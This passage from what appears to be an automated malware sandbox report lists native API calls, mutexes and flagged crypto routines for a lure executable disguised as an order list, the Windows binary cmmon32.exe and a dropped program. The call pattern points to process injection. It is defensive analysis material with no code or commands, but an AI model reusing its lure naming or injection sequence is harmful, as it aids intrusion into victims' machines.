Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BBA30 NtSetContextThread,6_2_043BBA30
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA220 NtWaitForSingleObject,6_2_043BA220
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA2F0 NtQueryInformationFile,6_2_043BA2F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA2D0 NtClose,6_2_043BA2D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043BA370 NtQueryInformationProcess,6_2_043BA370
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16B50 NtCreateFile,6_2_00C16B50
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16C00 NtReadFile,6_2_00C16C00
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16D30 NtAllocateVirtualMemory,6_2_00C16D30
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16BFA NtReadFile,6_2_00C16BFA
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16B4A NtCreateFile,6_2_00C16B4A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16C4A NtReadFile,6_2_00C16C4A
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C16C7A NtReadFile,6_2_00C16C7A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416B50 NtCreateFile,19_2_00416B50
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416C00 NtReadFile,19_2_00416C00
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416D30 NtAllocateVirtualMemory,19_2_00416D30
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416B4A NtCreateFile,19_2_00416B4A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416BFA NtReadFile,19_2_00416BFA
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416C4A NtReadFile,19_2_00416C4A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00416C7A NtReadFile,19_2_00416C7A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A3E0 NtFreeVirtualMemory,LdrInitializeThunk,19_2_0193A3E0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A360 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_0193A360
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A240 NtReadFile,LdrInitializeThunk,19_2_0193A240
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A5F0 NtReadVirtualMemory,LdrInitializeThunk,19_2_0193A5F0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A540 NtDelayExecution,LdrInitializeThunk,19_2_0193A540
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A560 NtQuerySystemInformation,LdrInitializeThunk,19_2_0193A560
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A480 NtMapViewOfSection,LdrInitializeThunk,19_2_0193A480
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A460 NtOpenProcess,LdrInitializeThunk,19_2_0193A460
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A700 NtProtectVirtualMemory,LdrInitializeThunk,19_2_0193A700
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A720 NtResumeThread,LdrInitializeThunk,19_2_0193A720
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A750 NtCreateFile,LdrInitializeThunk,19_2_0193A750
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A6A0 NtCreateSection,LdrInitializeThunk,19_2_0193A6A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A610 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_0193A610
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B0B0 NtGetContextThread,19_2_0193B0B0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A800 NtSetValueKey,19_2_0193A800
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A3D0 NtCreateKey,19_2_0193A3D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A310 NtEnumerateValueKey,19_2_0193A310
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A350 NtQueryValueKey,19_2_0193A350
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A370 NtQueryInformationProcess,19_2_0193A370
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A2D0 NtClose,19_2_0193A2D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A2F0 NtQueryInformationFile,19_2_0193A2F0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193BA30 NtSetContextThread,19_2_0193BA30
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A220 NtWaitForSingleObject,19_2_0193A220
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A260 NtWriteFile,19_2_0193A260
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A5A0 NtWriteVirtualMemory,19_2_0193A5A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A520 NtEnumerateKey,19_2_0193A520
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193BD40 NtSuspendThread,19_2_0193BD40
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A4A0 NtUnmapViewOfSection,19_2_0193A4A0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193ACE0 NtCreateMutant,19_2_0193ACE0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A410 NtQueryInformationToken,19_2_0193A410
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B410 NtOpenProcessToken,19_2_0193B410
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A430 NtQueryVirtualMemory,19_2_0193A430
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A470 NtSetInformationFile,19_2_0193A470
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193B470 NtOpenThread,19_2_0193B470
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A780 NtOpenDirectoryObject,19_2_0193A780
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A710 NtQuerySection,19_2_0193A710
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A6D0 NtCreateProcessEx,19_2_0193A6D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0193A650 NtQueueApcThread,19_2_0193A650
Creates mutexesShow sources
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:744:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_01
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F728E83_2_00F728E8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED48CB3_2_00ED48CB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F518B63_2_00F518B6
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EBA0803_2_00EBA080
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED10703_2_00ED1070
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED00213_2_00ED0021
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EDE0203_2_00EDE020
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6D0163_2_00F6D016
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED98103_2_00ED9810
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F719E23_2_00F719E2
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F661DF3_2_00F661DF
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F7D9BE3_2_00F7D9BE
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED61803_2_00ED6180
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED594B3_2_00ED594B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EF99063_2_00EF9906
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED71103_2_00ED7110
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F722DD3_2_00F722DD
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC42B03_2_00EC42B0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F71A993_2_00F71A99
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED4A5B3_2_00ED4A5B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED523D3_2_00ED523D
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F7E2143_2_00F7E214
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F60A023_2_00F60A02
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EAEBE03_2_00EAEBE0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED63C23_2_00ED63C2
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED4B963_2_00ED4B96
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ECFB403_2_00ECFB40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F644EF3_2_00F644EF
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6DCC53_2_00F6DCC5
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F634903_2_00F63490
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F71C9F3_2_00F71C9F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F72C9A3_2_00F72C9A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED547E3_2_00ED547E
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F5F42B3_2_00F5F42B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EB740C3_2_00EB740C
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC14103_2_00EC1410
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F51DE33_2_00F51DE3
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6D5D23_2_00F6D5D2
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F5FDDB3_2_00F5FDDB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6E5813_2_00F6E581
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F4E58A3_2_00F4E58A
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EA0D403_2_00EA0D40
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F4C53F3_2_00F4C53F
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC15303_2_00EC1530
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F61D1B3_2_00F61D1B
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F725193_2_00F72519
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F726F83_2_00F726F8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F63E963_2_00F63E96
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED4E613_2_00ED4E61
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F6CE663_2_00F6CE66
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED5E703_2_00ED5E70
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC76403_2_00EC7640
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00ED66113_2_00ED6611
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F71FCE3_2_00F71FCE
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F627823_2_00F62782
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00EC57903_2_00EC5790
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_00F717463_2_00F71746
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003C78F03_2_003C78F0
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003C78EC3_2_003C78EC
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DB0D83_2_003DB0D8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D9AB33_2_003D9AB3
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DA3B83_2_003DA3B8
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DA4E13_2_003DA4E1
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DACC13_2_003DACC1
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DA6893_2_003DA689
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003DA6EB3_2_003DA6EB
Source: C:\Users\user\Desktop\42LIST OF ITEMS TO ORDER.exeCode function: 3_2_003D9F1F3_2_003D9F1F
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043914106_2_04391410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0438740C6_2_0438740C
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A547E6_2_043A547E
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0442F42B6_2_0442F42B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044344EF6_2_044344EF
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044334906_2_04433490
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04441C9F6_2_04441C9F
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043915306_2_04391530
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04431D1B6_2_04431D1B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044425196_2_04442519
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04370D406_2_04370D40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0441C53F6_2_0441C53F
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0443D5D26_2_0443D5D2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0442FDDB6_2_0442FDDB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04421DE36_2_04421DE3
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0443E5816_2_0443E581
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0443CE666_2_0443CE66
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A66116_2_043A6611
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A5E706_2_043A5E70
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A4E616_2_043A4E61
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043976406_2_04397640
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044426F86_2_044426F8
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04433E966_2_04433E96
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044417466_2_04441746
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04441FCE6_2_04441FCE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043957906_2_04395790
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044327826_2_04432782
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043AE0206_2_043AE020
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A00216_2_043A0021
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A10706_2_043A1070
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0443D0166_2_0443D016
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044428E86_2_044428E8
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0438A0806_2_0438A080
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A48CB6_2_043A48CB
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044218B66_2_044218B6
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A71106_2_043A7110
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A594B6_2_043A594B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044419E26_2_044419E2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A61806_2_043A6180
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0444D9BE6_2_0444D9BE
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A523D6_2_043A523D
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04394A106_2_04394A10
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04430A026_2_04430A02
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0444E2146_2_0444E214
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A4A5B6_2_043A4A5B
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043942B06_2_043942B0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_044422DD6_2_044422DD
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_04441A996_2_04441A99
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0439FB406_2_0439FB40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A4B966_2_043A4B96
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_0437EBE06_2_0437EBE0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_043A63C26_2_043A63C2
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C1B0D86_2_00C1B0D8
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C078EC6_2_00C078EC
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C078F06_2_00C078F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 6_2_00C1ACC16_2_00C1ACC1
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_2_0033521518_2_00335215
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1F86018_1_00C1F860
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1EDD818_1_00C1EDD8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C16DA318_1_00C16DA3
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1FF5818_1_00C1FF58
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C22F6518_1_00C22F65
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C15B7D18_1_00C15B7D
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 18_1_00C1F31C18_1_00C1F31C
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041B0D819_2_0041B0D8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_004078EC19_2_004078EC
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_004078F019_2_004078F0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00419AB319_2_00419AB3
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041A3B819_2_0041A3B8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041ACC119_2_0041ACC1
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041A4E119_2_0041A4E1
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041A6EB19_2_0041A6EB
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0041A68919_2_0041A689
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_00419F1F19_2_00419F1F
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192618019_2_01926180
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019CD9BE19_2_019CD9BE
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B61DF19_2_019B61DF
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C19E219_2_019C19E2
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192711019_2_01927110
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0194990619_2_01949906
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192594B19_2_0192594B
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0190A08019_2_0190A080
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019A18B619_2_019A18B6
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019248CB19_2_019248CB
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C28E819_2_019C28E8
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192981019_2_01929810
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019BD01619_2_019BD016
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192E02019_2_0192E020
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192002119_2_01920021
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192107019_2_01921070
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_01924B9619_2_01924B96
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019263C219_2_019263C2
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_018FEBE019_2_018FEBE0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0191FB4019_2_0191FB40
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C1A9919_2_019C1A99
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019142B019_2_019142B0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C22DD19_2_019C22DD
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019CE21419_2_019CE214
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B0A0219_2_019B0A02
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192523D19_2_0192523D
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_01924A5B19_2_01924A5B
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0199E58A19_2_0199E58A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019BE58119_2_019BE581
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019AFDDB19_2_019AFDDB
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019BD5D219_2_019BD5D2
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019A1DE319_2_019A1DE3
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B1D1B19_2_019B1D1B
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C251919_2_019C2519
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0191153019_2_01911530
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0199C53F19_2_0199C53F
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_018F0D4019_2_018F0D40
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C1C9F19_2_019C1C9F
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C2C9A19_2_019C2C9A
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B349019_2_019B3490
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019BDCC519_2_019BDCC5
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B44EF19_2_019B44EF
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0191141019_2_01911410
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0190740C19_2_0190740C
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019AF42B19_2_019AF42B
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0192547E19_2_0192547E
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_0191579019_2_01915790
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B278219_2_019B2782
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C1FCE19_2_019C1FCE
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_018F67D019_2_018F67D0
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019C174619_2_019C1746
Source: C:\Program Files (x86)\Eobzxyvuh\px7426l3fbx.exeCode function: 19_2_019B3E9619_2_019B3E96
